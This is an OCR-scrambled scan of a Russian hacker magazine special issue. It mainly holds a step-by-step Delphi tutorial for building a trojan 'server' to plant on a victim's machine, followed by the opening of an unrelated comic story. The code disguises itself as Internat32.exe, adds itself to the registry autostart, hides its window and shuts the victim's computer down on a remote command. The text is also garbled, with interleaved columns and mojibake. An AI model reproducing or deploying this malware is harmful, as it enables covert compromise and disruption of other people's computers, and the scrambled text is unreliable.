книги хакеры / журнал хакер / специальные выпуски / Специальный выпуск 4_compressed

ФИШКИ

>СПЕЦВЫПУСК #4

0031

49

50

0032

ФИШКИ

>СПЕЦВЫПУСК #4

ФИШКИ

>СПЕЦВЫПУСК #4

0033

51

52

0034

ФИШКИ

>СПЕЦВЫПУСК #4

КОНСТРУКТОР

>СПЕЦВЫПУСК #4

0035

53

БОЕВОЙ

ÊÎÍÜ

ÇÀ 10

МИНУТ

Horrific (smirnandr@mail.ru)

Ты уже сто раз слышал это

другое (желательно больше 1000).

магическое слово - “Троян”. È

Теперь щелкни в любом месте на форме, чтобы

активизировать ее свойства. Перейди в

мы уже много раз обозревали

ObjectInspector и щелкни по закладке Events.

различных коней этой породы.

Дважды щелкни по строке “OnCreate”, и Delphi,

Сегодня... ты можешь создать

как всегда, создаст процедуру, которая будет

выполняться при инициализации формы. Напи-

своего собственного боевого

ши там следующее:

коня. Ну, а если вдруг не

procedure TForm1.FormCreate(Sender: TObject);

захочешь сделать это прямо

var RegIni:TRegIniFile;

сейчас, то, по крайней мере,

begin

узнаешь, как работают трояны

RegIni:=TRegIniFile.Create(‘Software’);

изнутри. Приготовься, нам

RegIni.RootKey:=HKEY_LOCAL_MACHINE;

RegIni.OpenKey(‘Software’, true);

предстоит написать сразу две

RegIni.OpenKey(‘Microsoft’, true);

проги. Одна будет находиться

RegIni.OpenKey(‘Windows’, true);

RegIni.OpenKey(‘CurrentVersion’, true);

на твоей машине (клиент),

R e g I n i . W r i t e S t r i n g ( ‘ R u n S e r v i c e s ’ ,

другую надо будет подбросить

‘Internat32.exe’, Application.ExeName);

жертве (сервер).

RegIni.Free;

ServerSocket1.Active:=true;

Троянский сервер

end;

ServerSocket из раздела “Internet”, это сервак

протокола (по умолчанию TCP, и нам его доста-

Теперь перейди в начало текста и напиши после

Запускай Delphi или, если он у тебя уже запу-

точно). Выдели созданный ServerSocket1 и пе-

“uses” слово “registry”. Мы уже делали такую

щен, создавай новый проект (“File” - “New

рейди в ObjectInspector. Здесь тебя интересует

операцию в статье про мега-плеер, но я повто-

Application”). Сейчас мы примемся за серверную

только свойство “Port”. По умолчанию оно равно

рю, как это будет выглядеть:

часть трояна.

1024, но я тебе советую его поменять на любое

uses registry, Windows, Messages,

Для начала выбери пункт меню “Options” из ме-

ню “Project”. Перед тобой будет окно, как на ри-

Теперь я объясню, что мы написали в процеду-

сунке 1.

Здесь ты должен перенести “Form1” из раздела

ðå.

“Auto-Create forms” (список слева) в “Available

forms” (список справа), как это сделано у меня.

“var RegIni:TRegIniFile” - здесь мы объявили пе-

Только что мы отключили Form1 из списка ав-

ременную RegIni типа TRegIniFile. С помощью

тоинициализируемых форм. Теперь инициали-

этой переменной мы будем общаться с реес-

зацию придется произвести вручную. Не пугай-

òðîì.

ся, это очень просто.

“RegIni:=TRegIniFile.Create(‘Software’)” -

èíè-

На странице “Application” этого же диалога есть

циализируем переменную, указывающую на

кнопка “Load Icon”. Нажми ее, чтобы сменить

реестр.

иконку будущей проги. Если икону не сменить,

“RegIni.RootKey:=HKEY_LOCAL_MACHINE” ãîâî-

то будет использоваться дельфячья, а она быс-

рим, что нас интересует раздел HKEY_CUR-

тро выдаст твое смертельное оружие.

Рисунок 1.

RENT_USER реестра.

Теперь ты должен бросить на форму компонент

“RegIni.OpenKey(‘Software’, true)” - открываем

54

0036

КОНСТРУКТОР

>СПЕЦВЫПУСК #4

подраздел “Software”.

ExitWindowsEx - редаун заставит окна свернуть-

Application.Process-Messages;

Дальше я последовательно открываю подразде-

ся и отключить компьютер от питания. Я вообще

end;

лы, пробираясь в недра окошек.

добрый дядька, поэтому использовал параметр

end.

“ R e g I n i . W r i t e S t r i n g ( ‘ R u n S e r v i c e s ’ ,

EWX_SHUTDOWN. С этим параметром перед ре-

‘Internat32.exe’, Application.ExeName)” - записы-

дауном всем запущенным приложениям полетит

Áóäü

внимателен при

переписывании. Все

äîë -

ваю в раздел “RunServices” (в этом разделе хра-

запрос о выключении, и жертва сможет сохра-

æíî

быть один к одному.

Теперь я расскажу,

÷òî

нятся проги, которые автоматически загружают-

нить свои измененные данные. Если ты злей ме-

здесь написано:

ся при старте) новый параметр с именем

ня, то используй EWX_FORCE. В этом случае

В самом начале нет ничего интересного, и

íàñ

“Internat32.exe” (имя будущего файла) и значе-

компьютер упадет без предупреждения и со

абсолютно не касается. Нас интересует

âñå,

÷òî

нием Application.ExeName (здесь хранится пол-

скоростью света, так что жертва не успеет от

написано после слова

“Var”.

ный путь к запущенному трояну).

страха воздух испортить :).

WhEvent:THandle - Ýòèì

я говорю, что мне

нужен

“RegIni.Free” - уничтожаю ненужный больше

Троян практически готов, сохрани его. Для это-

указатель WhEvent на пустое событие Thandle.

объект RegIni.

го выбери “Save All” из меню “File”. Сначала

Application.Initialize -

Инициализируется

троян.

Delphi запросит имя формы. Оставь по умолча-

Все это делалось, чтобы при запуске проги она

ShowWindow(Application.Handle, SW_Hide) - Óñòà-

сама себя прописывала в разделе автозапуска.

нию (Unit1) и нажми “Сохранить”. Потом будет

навливаю параметры окна. Параметр SW

_Hide -

И после перезагрузки компьютера она автома-

запрос на имя проекта, которое будет использо-

говорит, что окно должно быть невидимо.

Åäèí-

тически загружалась в память.

ваться в качестве имени ЕХЕ файла. Назови его

ственное, как его можно после этого

увидеть,

Самая последняя строка “ServerSocket1.Ac-

“Internat32”, чтобы файл не вызывал особых по-

так это нажать Ctrl+Alt+Del. Но здесь у

íàñ èñ-

tive:=true” запускает сервер на указанном тобой

дозрений.

пользуется не вызывающее подозрения

(только

порте.

Конюшня для коня

у чайника, профи уже давно знают о таком име-

С загрузкой покончено. Теперь давай займемся

íè) èìÿ.

выгрузкой. Опять выдели форму и в закладке

Form1:=TFo-rm1.Create(nil) - создаю форму.

Events у ObjectInspector-а дважды щелкни по

Теперь ты должен хорошенечко спрятать своего

Мне приходится это делать так, потому что мы

строке

“OnDistroy”.

Теперь создастся процеду-

будущего скакуна, чтоб его не было видно в па-

убрали форму из списка авто создаваемых.

ðà,

которая будет выполняться при уничтожении

нели задач. Для этого выбери пункт меню

Application.Run - запускаю трояна. Здесь запус-

формы. В созданной процедуре напиши:

“Project Manager” из меню “View”. Перед тобой

каются обработчики событий и прочая ерунда,

откроется окно, как на рисунке 2.

за которую отвечает Delphi и которую пришлось

procedure TForm1.Form-Distroy(Sender: TObject;

бы писать вручную на С или С++. А здесь все

var Action: TCloseAction);

очень просто.

begin

WhEvent:=Cre-ateEvent(nil, true,false, ‘et’) - èíè-

ServerSocket1.Active:=false;

циализация пустого события.

end;

Следующие пять строчек я напишу словами, а

ты разберешься, как всегда, методом сравне-

Этим я отключаю сервак. Если этого не сделать,

Рисунок 2.

íèÿ:

то при первой же перезагрузке твоя жертва мо-

Пока (true) выполнять

жет поймать синий экран, если ты в это время

Начать цикл

будешь подключен к серверу. С одной стороны,

Щелкни правой кнопкой по

Internat32.exe è â

Ждать пока наступит событие (пустое собы-

это хорошо. Твоя жертва в очередной раз убеж-

появившемся меню выбери

“View Source”. Ïå-

тие, 1000 миллисекунд)

дается в плохой защищенности его окошек. А с

ред тобой откроется маленький

файл с исход-

Получить управление

другой, я не думаю, что следует выдавать себя

ным текстом проекта. Сравни

òî, ÷òî òû óâè-

Закончить цикл

раньше времени. Тем более, что после синего

дишь, с этим текстом, и допиши

òî, ÷åãî íå õâà-

Две строчки между началом и концом цикла бу-

экрана перезагрузка может остановиться, а нам

тает, а что лишнее - убери (не

так уж и много):

дут выполняться бесконечно, потому что true,

это не нужно (забегу вперед и скажу, что мы са-

оно всегда true, и из этого цикла выхода нет.

ми будем перегружать компьютер жертвы).

program Internat32;

Вся фишка - в двух особенностях цикла:

Теперь надо выделить ServerSocket1 и перейти

uses

1. Запускается ожидание несуществующего со-

на закладку Events у ObjectInspector-а. Дважды

Forms,

бытия. Так как событие не существует, то прог-

щелкни по строке “OnClientRead” и в созданной

Windows.

рамма прождет его ровно указанное время в ка-

процедуре (она будет вызываться, когда что-ни-

Unit1 in ‘Unit1.pas’

{Form1};

честве второго параметра (1000 миллисекунд

будь приходит на порт) напиши:

{$R *.RES}

или 1 секунда).

var

2. Отдается команда “Получить управление”.

procedure

TForm1.ServerSocket1ClientRead-

WhEvent:THandle;

После второго шага программа снова перейдет

(Sender: TObject;

begin

на пункт 1 и запустит ожидание. Во время ожи-

Socket: TCustomWinSocket);

Application.Initialize;

дания пользователь работает с другими прило-

begin

ShowWindow(Appli-

жениями как всегда. Когда трояну (каждую 1 се-

if Socket.ReceiveText =’R’ then

cation.Handle,SW_Hide);

кунду) передается управление, то наш конь про-

ExitWindowsEx(EWX_SHUTDOWN,0);

Form1:=TForm1.Create(nil);

веряет: есть ли для него сообщения. В нашем

end;

Application.Run;

случае сообщение может быть одно - приход на

WhEvent:=CreateEvent(nil, true,false,

указанный тобой порт управляющей команды.

Теперь смотри, как это звучит по-нашему:

‘et’);

Если сообщения есть, то троян их выполняет. И

Если полученный текст = букве ‘R’ то

while (true) do

в любом случае (есть сообщения или нет), пос-

Отправить компьютер в редаун.

begin

ле этого пользователь снова работает 1 секунду

WaitForSingleObject(Wh-Event,1000);

без проблем. Проверка происходит так быстро,

56

0038

БАЙКА

>СПЕЦВЫПУСК #4

БАЙКА

>СПЕЦВЫПУСК #4

0039

57

... и опять пошла реклама очередных подгузников. По-

листических ракет. До сих пор террорист никак не

том реклама “Сникерса”, потом - заставка балета “Ле-

сформулировал свои требования.

бединое Озеро”, а потом, наконец, появилась заставка

телевизионных новостей.

- Вот! Слышал? - Покровский торжествовал. - Ну, ради

ЭТОГО стоило бросить твою подмосковную песочницу,

- Смотри, - глухо сказал Покровский мрачным голосом,

и приехать сюда! Знаешь, кто этот террорист?

- сейчас про ЭТО будет.

- Êòî?

На экране появилась похожая на селедку дикторша, и

забормотала себе под нос, держа в напряженных ру-

- Рамхак. Рома Хади. Наш ведущий программист! Он

чонках листки с текстом:

свой язык написал - РХ++ - так ему Нобелевскую пре-

мию за него дали. Ну, он тогда - уж две недели назад

- Волна террора прокатилась по планете. Вот уже че-

как -уехал в Урюпинск - праздновать - и до сих пор не

тыре дня террористами захвачен ликеро-водочный за-

вернулся. И в редакцию не звонит больше...

вод в подмосковном городе Лотошино. До сих пор тер-

рористы никак не сформулировали свои требования...

Не успел я переспросить Серегу, почему это он так

уверен в личности террориста, к к он протянул мне

àíäà

- Во, представляешь? - оживился Покровский. - Траге-

пачку бумажек.

дия! У них там залож ики! Кааашмаррр!

- И за этим ты меня вытащил с отдыха? - от Покровско-

- А это что, Серег? - меня вдруг охватило скверное

го я, конечно, ожидал чего-то подобного, но не думал,

предчувствие какой-то подпольной пакости. - БИЛЕТЫ

что это будет ликеро-водочный террор. - Серега, я си-

НА САМОЛЕТ В США!? И что мы там будем делать?

дел на даче, без телевизора, между прочим, никого не

трогал, ходил на рыбалку, копался в огороде... “Холод,

- Поправочка, Холод - Серега был жутко доволен

срочно приезжай ко мне! Давай-давай, собирайся, за-

произведенным впечатлением, - не МЫ, а ТЫ будешь

совывай свою задницу в машину, и прямо сейчас - в

делать. Сегодня утром к нам обратились люди из ФСБ,

Москву!” Да ты обалдел!.

и потребовали, чтоб мы своего Рамхака немедленно

вернули в Москву, пока он Третью Мировую не начал.

Покровский едва успел открыть рот и набрать воздуха

Поэтому ты летишь туда.

для оправданий, как дикторша на экране переложила

листки в руках, и забормотала с новой силой:

- А ты? - я вс¸ ещ¸ не мог поверить в вероломство Пок-

ровского. - А что ты?

- Вчера в США, близ города Вашингтон, округ Колум-

бия, неизвестным русским террористом был захвачен

- А я... - Серега замялся. - Ну, я не могу в Америку. Я

центр управления запуском межконтинентальных бал-

же ещ¸ даже не женат. И потом: у меня другая задача.

58

003A

БАЙКА

>СПЕЦВЫПУСК #4

Вот, сегодня когда приезжали ФСБшники, так они ска-

колона “Красная Москва”, чтоб

отстали. Впрочем, то и

зали, чтоб я... террористов на ликеро-водочном заво-

другое я спер в самолете. А в

магазин мне надо было

де обезвредил. Завтра же! То есть, уже сегодня. Вот.

зайти по понятным причинам: во

-первых, хотелось ес-

Так что сейчас отвезу тебя в аэропорт, и поеду их

ть, а во-вторых, надо было узнать

последние новости о

обезвреживать. Собирайся!

Рамхаке.

Я зашел в магазин - несмотря

на весьма и весьма

Потому, что мы банда,

èëè

скромные размеры - с нашу булочную, примерно - это

оказался почти что супермаркет. Огромный выбор ка-

велком Америка

ких-то невразумительных шоколадок, булочек, тетра-

паков с кефирами и прочим молоком, и - в довершение

...”просим Вас оставаться на своих местах до полной

всего - гигантский мясной отдел. На крюках под конди-

остановки двигателей”. Аэрофлотовская

стюардесса,

шеном висели копченые свиные ноги, ребрышки и ру-

вильнув сухим и кривым задом, прошла через салон, и

леты. Слева, над стойкой бара, и, по совместитель-